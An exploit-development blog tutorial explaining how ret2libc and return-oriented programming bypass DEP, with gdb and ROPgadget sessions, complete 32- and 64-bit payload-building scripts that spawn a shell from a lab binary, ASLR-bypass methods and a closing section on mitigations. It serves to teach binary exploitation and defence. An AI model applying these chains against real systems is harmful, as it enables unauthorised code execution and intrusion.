Thilan Dissanayaka Exploit Development April 05, 2020

Bypassing DEP with Return-Oriented Programming (ROP)

In the Linux buffer overflow tutorial and the Windows buffer overflow tutorial, we exploited stack overflows by injecting shellcode onto the stack and redirecting EIP to execute it. It worked because we disabled DEP (Data Execution Prevention).

But in the real world, DEP is on. The stack is marked as non-executable. Even if our shellcode lands perfectly in memory, the CPU refuses to execute it — the NX bit in the page table says “this is data, not code.”

So how do modern exploits achieve code execution when they can’t inject code?

The answer is Return-Oriented Programming (ROP). Instead of injecting new code, we reuse code that already exists in the process — fragments of legitimate functions in the executable and its loaded libraries. We chain these fragments together to build an arbitrary program, one instruction at a time.

ROP is a foundational technique in modern binary exploitation. Most real-world memory-corruption exploits against DEP-protected targets rely on it or on a close variant, so if you understand ROP, you understand how those exploits work.

Why DEP Kills Traditional Shellcode

Let’s be clear about what DEP does. Every memory page has permission flags:

.text  (code)  → Read + Execute     (RX)
.data  (data)  → Read + Write       (RW)
Stack          → Read + Write       (RW)  ← NO Execute
Heap           → Read + Write       (RW)  ← NO Execute

When we overflow the buffer and write shellcode to the stack, it sits in an RW page. When we redirect EIP to our shellcode, the CPU checks the page permissions, sees there’s no Execute flag, and raises an access violation.

Before DEP:  Stack = RWX → shellcode runs fine
After DEP:   Stack = RW  → "Access Violation: attempted to execute non-executable memory"

We can write anything to the stack. We just can’t execute what we write. So we need a different approach.
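On Linux, these permission flags are visible in /proc/<pid>/maps. The following is a minimal sketch that reads the flags out of one maps line, assuming the usual whitespace-separated layout; the two sample lines and the helper names are made up for illustration.

```python
def page_permissions(maps_line):
    """Return (region_name, perms) parsed from one /proc/<pid>/maps line."""
    fields = maps_line.split()
    perms = fields[1]                                  # e.g. "rw-p" or "r-xp"
    name = fields[5] if len(fields) > 5 else "[anonymous]"
    return name, perms


def is_executable(maps_line):
    """True if the mapping carries the execute permission."""
    return "x" in page_permissions(maps_line)[1]


# Hypothetical sample lines in the /proc/<pid>/maps format
SAMPLE_TEXT = "08048000-08049000 r-xp 00000000 08:01 131090 /home/user/vulnerable"
SAMPLE_STACK = "fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack]"

for line in (SAMPLE_TEXT, SAMPLE_STACK):
    name, perms = page_permissions(line)
    print(f"{name:30} {perms}  executable={is_executable(line)}")
```

With DEP active, the [stack] line shows rw-p: writable, but never executable.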

The Core Idea — Reusing Existing Code

Here’s the key insight: the .text section of the executable and its loaded DLLs (libc, kernel32, ntdll, etc.) are already executable. These are legitimate code pages with the Execute permission. We can’t inject new code, but we can jump to code that’s already there.

The simplest version of this is ret2libc — return to a libc function.

ret2libc — The Predecessor to ROP

Instead of returning to shellcode, we overwrite the return address with the address of a libc function — like system(). Then we arrange the stack so that system() receives the argument "/bin/sh".

The stack layout:

| buffer padding | EBP | system() addr | return after system | "/bin/sh" addr |

When the vulnerable function returns:

ret pops system() address into EIP
CPU jumps to system() — which is in an executable page (libc)
system() reads its argument from the stack — the address of "/bin/sh"
system("/bin/sh") executes — shell spawned

No shellcode needed. We just called an existing function with our own arguments.
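The steps above can be modelled in a few lines of Python. This is only a sketch of the 32-bit cdecl view of the stack, not an exploit; the three addresses are placeholders and differ on every system.

```python
import struct

# Placeholder addresses for illustration only
SYSTEM_ADDR = 0xf7e42da0
EXIT_ADDR = 0xf7e369e0
BINSH_ADDR = 0xf7f588cf

# The three words that overwrite the saved return address and what follows it
chain = struct.pack("<3I", SYSTEM_ADDR, EXIT_ADDR, BINSH_ADDR)
words = list(struct.unpack("<3I", chain))

# Step 1: the vulnerable function's `ret` pops the first word into EIP.
eip = words.pop(0)

# Step 2: at system()'s entry the stack looks like an ordinary call:
# [ESP] holds the return address, [ESP+4] holds the first argument.
return_address, first_arg = words[0], words[1]

print(f"EIP={eip:#x} return={return_address:#x} arg1={first_arg:#x}")
```

The word after system()'s address is what system() treats as its own return address, which is why that slot has to hold something, even if it is only a dummy value.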

Finding the Addresses

# Find system() address in libc
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e42da0 <__libc_system>

# Find "/bin/sh" string in libc (libc contains this string!)
(gdb) find &system, +9999999, "/bin/sh"
0xf7f588cf

# Find exit() for clean termination
(gdb) p exit
$2 = {<text variable, no debug info>} 0xf7e369e0 <__GI_exit>

The Exploit

import struct

offset = 76  # padding to reach return address (varies per binary)

system_addr = struct.pack("<I", 0xf7e42da0)
exit_addr   = struct.pack("<I", 0xf7e369e0)
binsh_addr  = struct.pack("<I", 0xf7f588cf)

# Stack layout after overflow:
# [padding] [system()] [exit()] ["/bin/sh"]
#                       ^return   ^argument
payload = b"A" * offset + system_addr + exit_addr + binsh_addr

with open("payload", "wb") as f:
    f.write(payload)

$ (cat payload; cat) | ./vulnerable
ls
exploit.py  payload  vulnerable  vulnerable.c
whoami
thilan

Shell spawned. No shellcode. No executable stack. DEP is still on.
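Before sending a payload like this, it is worth checking it for bytes that the vulnerable input routine would stop at. The sketch below assumes the input is read by something that terminates on a newline or NUL byte (which bytes matter depends on the function the target actually uses); find_bad_bytes is a hypothetical helper, not part of any library.

```python
import struct


def find_bad_bytes(payload, bad=b"\x00\x0a"):
    """Return (offset, byte_value) pairs for every forbidden byte in payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


offset = 76
payload = b"A" * offset + struct.pack("<3I", 0xf7e42da0, 0xf7e369e0, 0xf7f588cf)

# "<I" packs little-endian, so 0xf7e42da0 is stored as a0 2d e4 f7
print(payload[offset:offset + 4].hex())

# An empty list means none of the forbidden bytes occur in the payload
print(find_bad_bytes(payload))
```

If an address does contain a bad byte, the usual options are a different gadget or function address, or a different copy of the same string.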

Limitations of ret2libc

ret2libc works for simple cases, but it’s limited:

You can only call whole functions
Complex multi-step operations (like setting up a socket for a reverse shell) require chaining many function calls with carefully arranged arguments
On x86-64, arguments are passed in registers (rdi, rsi, rdx), not the stack — so you need to control registers too

This is where ROP comes in.

Return-Oriented Programming — The Full Technique

ROP generalizes ret2libc. Instead of jumping to whole functions, we jump to small fragments of code that end with a ret instruction. These fragments are called gadgets.

What’s a Gadget?

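A gadget is a short sequence of instructions ending with ret. They exist naturally throughout the executable and its libraries. Some are the tail ends of real functions. Others are unintended: x86 instructions have variable length, so starting to decode in the middle of an existing instruction can yield a different, perfectly valid instruction sequence.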

; Gadget 1: pop eax; ret
0x08048456:  pop eax
0x08048457:  ret

; Gadget 2: pop ebx; ret
0x0804862a:  pop ebx
0x0804862b:  ret

; Gadget 3: mov [eax], ebx; ret
0x08048734:  mov dword [eax], ebx
0x08048736:  ret

; Gadget 4: xor eax, eax; ret
0x08048512:  xor eax, eax
0x08048514:  ret

Each gadget does one small thing — pop a value into a register, move data, perform arithmetic — and then returns. The ret instruction pops the next address from the stack into EIP, jumping to the next gadget.

How ROP Chains Work

The ret instruction does one thing: pop EIP. It takes the 4-byte value at the top of the stack, puts it in EIP, and increments ESP by 4.

In a normal program, ret returns to the caller. But if we control the stack (via buffer overflow), we control what ret pops. We can make it pop any address — the address of our next gadget.

Stack (after overflow):
┌─────────────────────┐  ← ESP when the vulnerable function’s ret executes
│ Address of Gadget 1  │  → pop eax; ret
├─────────────────────┤
│ Value for EAX        │  → popped by "pop eax"
├─────────────────────┤
│ Address of Gadget 2  │  → pop ebx; ret  (popped by "ret" of Gadget 1)
├─────────────────────┤
│ Value for EBX        │  → popped by "pop ebx"
├─────────────────────┤
│ Address of Gadget 3  │  → mov [eax], ebx; ret
├─────────────────────┤
│ Address of Gadget 4  │  → next operation...
├─────────────────────┤
│ ...                  │
└─────────────────────┘

Execution flow:

Vulnerable function’s ret pops Gadget 1 address → jumps to pop eax; ret
pop eax loads our value into EAX. ret pops Gadget 2 address → jumps there
pop ebx loads our value into EBX. ret pops Gadget 3 address → jumps there
mov [eax], ebx writes EBX to the address in EAX. ret pops next address…

Each ret acts as the “glue” between gadgets. The stack becomes our program, and each entry is either a gadget address or data.

Given a rich enough gadget set, this is Turing-complete. We can perform any computation: arithmetic, memory reads/writes, system calls, function calls. We’re building a program out of fragments of existing code.
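To make the "stack as a program" idea concrete, here is a toy interpreter for a 32-bit chain. It is a sketch under simplifying assumptions: only three gadgets are modelled, their behaviour is written by hand rather than disassembled, and the writable address 0x0804a028 is a placeholder.

```python
import struct


def run_chain(chain, gadgets, max_steps=64):
    """Interpret a 32-bit ROP chain against a table of hand-modelled gadgets."""
    stack = list(struct.unpack(f"<{len(chain) // 4}I", chain))
    regs, mem = {"eax": 0, "ebx": 0}, {}

    def pop():
        return stack.pop(0)             # models ESP moving up by 4

    for _ in range(max_steps):
        if not stack:
            break
        eip = pop()                     # the `ret` that ends the previous gadget
        if eip not in gadgets:
            break                       # chain left the modelled gadgets
        for insn in gadgets[eip]:
            if insn == "pop eax":
                regs["eax"] = pop()
            elif insn == "pop ebx":
                regs["ebx"] = pop()
            elif insn == "mov [eax], ebx":
                mem[regs["eax"]] = regs["ebx"]
    return regs, mem


# Addresses of Gadgets 1-3 from the listing above
GADGETS = {
    0x08048456: ["pop eax"],
    0x0804862a: ["pop ebx"],
    0x08048734: ["mov [eax], ebx"],
}

# pop eax <- target address, pop ebx <- the bytes "/bin", then the write gadget
chain = struct.pack("<5I", 0x08048456, 0x0804a028, 0x0804862a, 0x6e69622f, 0x08048734)
regs, mem = run_chain(chain, GADGETS)
print({hex(addr): struct.pack("<I", value) for addr, value in mem.items()})
```

Nothing in the chain is code. The interpreter loop only ever follows addresses and consumes data, which is exactly what the CPU does when each gadget hits its ret.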

Finding Gadgets

You don’t search for gadgets by hand. Tools do this automatically.
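The core of what these tools do can be sketched in plain Python: scan the code bytes for a ret opcode (0xc3) and look at what immediately precedes it. This toy version only recognises a handful of fixed 32-bit encodings instead of using a real disassembler, and the byte blob is made up for illustration.

```python
# A few fixed x86 (32-bit) encodings, enough for a toy matcher
KNOWN = {
    b"\x58": "pop eax",
    b"\x5b": "pop ebx",
    b"\x59": "pop ecx",
    b"\x5a": "pop edx",
    b"\x31\xc0": "xor eax, eax",
    b"\x89\x18": "mov dword ptr [eax], ebx",
}
RET = 0xC3


def find_gadgets(code, base=0):
    """Return (address, text) for every known instruction directly before a ret."""
    found = []
    for i, byte in enumerate(code):
        if byte != RET:
            continue
        for encoding, text in KNOWN.items():
            start = i - len(encoding)
            if start >= 0 and code[start:i] == encoding:
                found.append((base + start, f"{text} ; ret"))
    return found


# Hypothetical bytes standing in for a .text section loaded at 0x08048000
blob = b"\x90\x58\xc3\x90\x31\xc0\xc3\x89\x18\xc3"
for address, text in find_gadgets(blob, base=0x08048000):
    print(f"{address:#010x} : {text}")
```

Because the scan works on raw bytes, it does not care where the compiler intended instructions to start. Real tools behave the same way, which is how they find gadgets the compiler never emitted on purpose.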

ROPgadget

$ ROPgadget --binary ./vulnerable

Gadgets information
============================================================
0x080485a6 : pop eax ; ret
0x080485f7 : pop ebx ; ret
0x0804861a : pop ecx ; pop edx ; ret
0x08048734 : mov dword ptr [eax], ebx ; ret
0x08048512 : xor eax, eax ; ret
0x080484f1 : inc eax ; ret
0x08048423 : int 0x80 ; ret
...

Unique gadgets found: 147

ropper

$ ropper --file ./vulnerable --search "pop eax"

[INFO] Searching for gadgets: pop eax
0x080485a6: pop eax; ret;
0x080487c3: pop eax; pop ebx; ret;

Searching in libc (many more gadgets)

$ ROPgadget --binary /lib/i386-linux-gnu/libc.so.6 | wc -l
12847

libc alone contains thousands of useful gadgets. The more code loaded into the process, the more gadgets available.

Practical Example — execve() via ROP on Linux

Let’s build a ROP chain that calls execve("/bin/sh", NULL, NULL) — the same thing our shellcode did, but without any injected code.

On 32-bit Linux, the execve syscall requires:

EAX = 11 (syscall number for execve)
EBX = pointer to "/bin/sh"
ECX = NULL (argv)
EDX = NULL (envp)
then: int 0x80

We need to:

Write the string “/bin/sh” somewhere in writable memory
Set EAX = 11
Set EBX = address of “/bin/sh”
Set ECX = 0
Set EDX = 0
Execute int 0x80
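The first step is done one 32-bit word at a time, so the string has to be split into NUL-padded 4-byte pieces. A small sketch of that split follows; string_to_words is a hypothetical helper, and the writable address is an assumed placeholder.

```python
import struct


def string_to_words(s, word_size=4):
    """Split s into NUL-terminated, NUL-padded chunks as (offset, bytes) pairs."""
    data = s + b"\x00"                              # always terminate the string
    data += b"\x00" * (-len(data) % word_size)      # pad to a whole number of words
    return [(i, data[i:i + word_size]) for i in range(0, len(data), word_size)]


writable = 0x0804a028   # assumed writable address (placeholder)
for off, word in string_to_words(b"/bin/sh"):
    value = struct.unpack("<I", word)[0]
    print(f"write {value:#010x} ({word!r}) to {writable + off:#x}")
```

"/bin/sh" is seven bytes, so with its terminator it fits exactly into two writes: "/bin" and "/sh\0".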

Step 1: Find Gadgets

$ ROPgadget --binary ./vulnerable | grep ": pop eax ; ret"
0x080485a6 : pop eax ; ret

$ ROPgadget --binary ./vulnerable | grep ": pop ebx ; ret"
0x080485f7 : pop ebx ; ret

$ ROPgadget --binary ./vulnerable | grep ": pop ecx"
0x0804861a : pop ecx ; pop edx ; ret    # bonus: sets both ECX and EDX!

$ ROPgadget --binary ./vulnerable | grep ": int 0x80"
0x08048423 : int 0x80 ; ret

Step 2: Find a Writable Location

We need somewhere to write “/bin/sh”. The .data or .bss section is writable:

$ readelf -S ./vulnerable | grep -E "\.data|\.bss"
  [24] .data    PROGBITS  0804a020  001020  000008  00  WA  0   0  4
  [25] .bss     NOBITS    0804a028  001028  000004  00  WA  0   0  1

We’ll write to 0x0804a028 (.bss section).

Step 3: Build the Chain

import struct

p = lambda x: struct.pack("<I", x)

# Gadget addresses (found with ROPgadget)
pop_eax     = 0x080485a6
pop_ebx     = 0x080485f7
pop_ecx_edx = 0x0804861a
mov_eax_ebx = 0x08048734  # mov dword [eax], ebx; ret
int_0x80    = 0x08048423
xor_eax     = 0x08048512  # xor eax, eax; ret
inc_eax     = 0x080484f1  # inc eax; ret

writable    = 0x0804a028  # .bss section

offset = 76  # padding to return address

payload = b"A" * offset

# --- Write "/bin" to .bss ---
payload += p(pop_eax)
payload += p(writable)       # EAX = address to write to
payload += p(pop_ebx)
payload += b"/bin"           # EBX = "/bin" (4 bytes)
payload += p(mov_eax_ebx)   # write "/bin" to [.bss]

# --- Write "/sh\x00" to .bss+4 ---
payload += p(pop_eax)
payload += p(writable + 4)   # EAX = .bss + 4
payload += p(pop_ebx)
payload += b"/sh\x00"        # EBX = "/sh\0"
payload += p(mov_eax_ebx)   # write "/sh\0" to [.bss+4]

# --- Set up registers for execve ---
payload += p(pop_ebx)
payload += p(writable)       # EBX = pointer to "/bin/sh"

payload += p(pop_ecx_edx)
payload += p(0)              # ECX = NULL (argv)
payload += p(0)              # EDX = NULL (envp)

# --- Set EAX = 11 (execve syscall number) ---
payload += p(xor_eax)       # EAX = 0
for _ in range(11):
    payload += p(inc_eax)   # EAX++ eleven times

# --- Trigger syscall ---
payload += p(int_0x80)      # execve("/bin/sh", NULL, NULL)

with open("payload", "wb") as f:
    f.write(payload)

$ (cat payload; cat) | ./vulnerable
whoami
thilan
id
uid=1000(thilan) gid=1000(thilan) groups=1000(thilan)

Shell spawned. DEP is on. No shellcode was injected. Every instruction we executed was already in the binary’s .text section. We just jumped to them in the right order.

ROP on x86-64

On 64-bit Linux (System V AMD64 ABI), the first six integer or pointer arguments go in registers (rdi, rsi, rdx, rcx, r8, r9), not on the stack. This actually makes ROP easier in some ways: we just need pop rdi; ret gadgets to set up arguments.

For calling system("/bin/sh"):

# 64-bit ROP chain
import struct

p64 = lambda x: struct.pack("<Q", x)   # pack a 64-bit little-endian value

offset  = 72                # placeholder: padding to the saved return address (varies per binary)
pop_rdi = 0x00400753        # pop rdi; ret (found with ROPgadget)
binsh   = 0x7ffff7f588cf    # address of "/bin/sh" in libc
system  = 0x7ffff7e42da0    # system() in libc
exit_fn = 0x7ffff7e369e0    # exit() in libc

payload = b"A" * offset
payload += p64(pop_rdi)      # pop rdi; ret
payload += p64(binsh)        # rdi = "/bin/sh"
payload += p64(system)       # call system("/bin/sh")
payload += p64(pop_rdi)      # pop rdi; ret (clean up)
payload += p64(0)            # rdi = 0
payload += p64(exit_fn)      # call exit(0)

Cleaner than the 32-bit version — one gadget to set the argument, one call to system().

Stack Alignment on x86-64

On 64-bit Linux, the System V ABI requires the stack to be 16-byte aligned before a call instruction. If your ROP chain doesn’t maintain alignment, system() or other libc functions may crash with a segfault on a movaps instruction (which requires 16-byte alignment).

The fix: add a single ret gadget before the function call to adjust the stack by 8 bytes.

ret_gadget = 0x00400754  # just "ret"

payload += p64(ret_gadget)   # align the stack
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)
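Why one extra ret is enough can be checked with simple arithmetic. The sketch below assumes the vulnerable function was itself entered through a normal call, so its saved return address sits at an address that is 8 modulo 16; the concrete stack address and the helper name are hypothetical.

```python
def entry_is_aligned(rsp_at_ret, target_index):
    """True if the function whose address is chain word `target_index`
    starts with RSP as it would be right after a normal `call`."""
    # The `ret` that consumes word `target_index` leaves RSP just past that word.
    rsp_at_entry = rsp_at_ret + 8 * (target_index + 1)
    return rsp_at_entry % 16 == 8


# Hypothetical address of the overwritten return slot (8 modulo 16)
rsp_at_ret = 0x7fffffffe0a8

# Chain: pop rdi, binsh, system -> system is word 2
print(entry_is_aligned(rsp_at_ret, 2))   # False

# Chain: ret, pop rdi, binsh, system -> system is word 3
print(entry_is_aligned(rsp_at_ret, 3))   # True
```

Each chain word shifts RSP by 8, so any odd number of extra words restores the alignment; a lone ret is simply the cheapest one.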

ROP on Windows

Windows ROP works the same way conceptually, but the calling convention and syscall interface differ.

On 32-bit Windows, you typically ROP into Windows API functions:

VirtualProtect() — Change memory page permissions (make the stack executable, then jump to shellcode)
VirtualAlloc() — Allocate a new RWX memory region, copy shellcode there, jump to it
WriteProcessMemory() — Write shellcode to an executable region

The most common approach is to use ROP to call VirtualProtect() and make the stack executable, then jump to your shellcode normally:

ROP chain:
Set up arguments for VirtualProtect(stack_addr, size, PAGE_EXECUTE_READWRITE, &old_protect)
Call VirtualProtect()
Stack is now executable
Jump to shellcode on the stack

This is called ROP to VirtualProtect — the classic Windows DEP bypass.
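In its simplest form, the stack for this approach looks like a ret2libc frame with four arguments. The sketch below only shows that layout for a 32-bit stdcall call; every address is a placeholder, and virtualprotect_frame is a hypothetical helper. Real chains usually have to compute the stack address and avoid NUL bytes at runtime using gadgets, which this sketch leaves out.

```python
import struct

PAGE_EXECUTE_READWRITE = 0x40   # Windows memory-protection constant


def virtualprotect_frame(vp_addr, shellcode_addr, region, size, old_protect_ptr):
    """Pack the stack words for a VirtualProtect call that returns into shellcode."""
    return struct.pack(
        "<6I",
        vp_addr,                 # popped by `ret`: execution enters VirtualProtect
        shellcode_addr,          # VirtualProtect's return address
        region,                  # lpAddress: start of the region to change
        size,                    # dwSize: number of bytes to change
        PAGE_EXECUTE_READWRITE,  # flNewProtect
        old_protect_ptr,         # lpflOldProtect: must point to writable memory
    )


# All addresses below are made-up placeholders
frame = virtualprotect_frame(
    vp_addr=0x11111111,
    shellcode_addr=0x22222240,
    region=0x22222000,
    size=0x1000,
    old_protect_ptr=0x33333330,
)
print(frame.hex())
```

Because VirtualProtect is stdcall, it removes its own four arguments when it returns, so execution continues at shellcode_addr with the stack already cleaned up.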

ASLR — The Next Challenge

We’ve bypassed DEP with ROP. But there’s another protection we’ve been ignoring: ASLR (Address Space Layout Randomization).

ASLR randomizes the base addresses of:

The executable (if PIE — Position Independent Executable)
Shared libraries (libc, etc.)
The stack
The heap

This means the gadget addresses we hardcoded change every run. Our ROP chain breaks because the gadgets aren’t where we expect them.

Defeating ASLR

ASLR is bypassed through information leaks — bugs that reveal memory addresses at runtime:

Format string vulnerabilities — printf(user_input) can leak stack contents, including return addresses and libc pointers.

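Partial overwrite — ASLR randomizes only the upper bits of an address. The lower 12 bits are always the same because mappings are page-aligned (4 KiB pages). A 1-byte overwrite of a saved pointer therefore stays entirely within known bits, and a 2-byte overwrite only has to guess 4 random bits, so execution can be redirected without knowing the full address.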

Information disclosure bugs — Buffer over-reads, uninitialized memory, error messages containing addresses.

Brute force (32-bit only) — On 32-bit Linux, ASLR has only ~8-12 bits of entropy for libraries. That’s 256-4096 possible positions. With a forking server (that doesn’t re-randomize), you can brute-force the correct address in seconds.

The typical attack flow:

Exploit info leak to discover libc base address
Calculate gadget addresses: gadget = libc_base + known_offset
Build ROP chain with correct addresses
Send ROP chain → shell

This is why modern exploitation often requires two-stage attacks: first leak an address, then exploit.
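The second step of that flow is plain arithmetic. A minimal sketch, assuming the leak is the runtime address of system(): the two offsets are hypothetical values for one particular libc build, and rebase is an illustrative helper, not a library function.

```python
# Offsets of symbols inside one specific libc build. Hypothetical values;
# real ones must be read from the exact libc the target uses.
SYSTEM_OFFSET = 0x3ada0
BINSH_OFFSET = 0x1508cf


def rebase(leaked_system):
    """Derive the libc base and related addresses from one leaked pointer."""
    base = leaked_system - SYSTEM_OFFSET
    if base & 0xfff:
        # Library bases are page-aligned; anything else means a bad leak or wrong libc
        raise ValueError("computed libc base is not page-aligned")
    return {"base": base, "system": leaked_system, "binsh": base + BINSH_OFFSET}


addrs = rebase(0xf7e42da0)
print({name: hex(value) for name, value in addrs.items()})
```

The page-alignment check is a cheap sanity test: if the computed base does not end in 000, the offsets do not match the libc that produced the leak.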

Automated ROP Chain Generation

Building ROP chains by hand is educational but tedious. Tools can generate them automatically:

pwntools (Python)

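from pwn import *

context.binary = elf = ELF('./vulnerable')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')

# Rebase libc to where it is loaded in the target process. Here we reuse the
# system() address seen in gdb earlier; under ASLR this must come from a leak.
libc.address = 0xf7e42da0 - libc.symbols['system']

# Search both the binary and libc for symbols and gadgets
rop = ROP([elf, libc])

# Automatically find gadgets and build a chain
rop.call('system', [next(libc.search(b'/bin/sh'))])
rop.call('exit', [0])

offset = 76  # padding to reach return address (varies per binary)
payload = b"A" * offset + rop.chain()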

ROPgadget automatic chain

$ ROPgadget --binary ./vulnerable --ropchain

ROP chain generation
===========================================================

- Step 1 -- Write-what-where gadgets
  [+] Gadget found: 0x08048734 mov dword ptr [eax], ebx ; ret
  ...

- Step 5 -- Syscall gadget
  [+] Gadget found: 0x08048423 int 0x80

ROP chain:
p = b""
p += pack('<I', 0x080485a6) # pop eax; ret
p += pack('<I', 0x0804a028) # .bss address
...

These tools search the binary for gadgets and automatically construct chains for common operations (execve, mprotect, etc.).

Mitigations Against ROP

The security community hasn’t been standing still:

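Control Flow Integrity (CFI) — Validates that indirect control transfers go to legitimate targets. Clang/LLVM’s CFI and Windows Control Flow Guard (CFG) check forward edges (indirect calls); protecting return addresses needs a separate backward-edge defense such as a shadow stack.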

Shadow Stacks — A separate, protected copy of the return address. On ret, the hardware compares the stack’s return address with the shadow stack. A mismatch indicates a ROP attack. Intel CET (Control-flow Enforcement Technology) implements this in hardware.

Stack Canaries — Random values placed between a function’s local buffers and its saved return address. A linear overflow that reaches the return address also overwrites the canary, and the mismatch is detected before ret executes. Canaries don’t prevent ROP directly, but they make the initial stack overflow much harder to exploit.

ASLR with high entropy — 64-bit ASLR has much more entropy than 32-bit, making brute force impractical. Combined with PIE (position-independent executables), every code address is randomized.

Restricted gadget availability — Compilers can be configured to reduce the number of useful gadgets by aligning returns, eliminating unnecessary code, and using alternative instruction sequences.
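The shadow stack idea from the list above is easy to model. This is a toy sketch of the concept only, not of how Intel CET is implemented; the class names and addresses are made up.

```python
class ShadowStackViolation(Exception):
    """Raised when a return address does not match its shadow copy."""


class Cpu:
    """Toy model: `call` pushes to both stacks, `ret` compares them."""

    def __init__(self):
        self.stack = []    # normal stack: attacker-writable after an overflow
        self.shadow = []   # shadow stack: not reachable by ordinary stores

    def call(self, return_address):
        self.stack.append(return_address)
        self.shadow.append(return_address)

    def ret(self):
        target, expected = self.stack.pop(), self.shadow.pop()
        if target != expected:
            raise ShadowStackViolation(f"{target:#x} != {expected:#x}")
        return target


cpu = Cpu()
cpu.call(0x08048500)
cpu.stack[-1] = 0x080485a6     # the overflow replaces the saved return address
try:
    cpu.ret()
except ShadowStackViolation as exc:
    print("blocked:", exc)
```

A ROP chain depends on every ret consuming an attacker-chosen address, so a check like this stops the chain at its very first gadget.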

Despite all these mitigations, ROP remains a viable technique. Each mitigation raises the bar, but creative attackers continue to find ways around them. That’s the arms race of exploit development.

Summary

Concept	What It Does
DEP/NX	Makes stack/heap non-executable — kills traditional shellcode
ret2libc	Return to libc functions — simplest DEP bypass
ROP	Chain gadgets (instruction fragments ending in `ret`) — full DEP bypass
Gadgets	Small instruction sequences in existing code, ending with `ret`
ROP Chain	Stack layout where each entry is a gadget address or data
ASLR	Randomizes addresses — requires info leak to bypass
Tools	ROPgadget, ropper, pwntools — automate gadget finding and chain building

The progression of exploit development tells a story:

Classic overflow — Inject shellcode, jump to it. Stopped by DEP.
ret2libc — Call existing functions. Limited to whole functions.
ROP — Chain gadgets for arbitrary computation. Bypasses DEP completely.
ROP + info leak — Defeat ASLR by discovering addresses at runtime.
Advanced mitigations — CFI, shadow stacks, CET. The arms race continues.

Understanding ROP is essential for both attackers and defenders. If you’re doing exploit development, it’s your primary tool. If you’re doing defense, it’s what you’re defending against.

Happy reversing!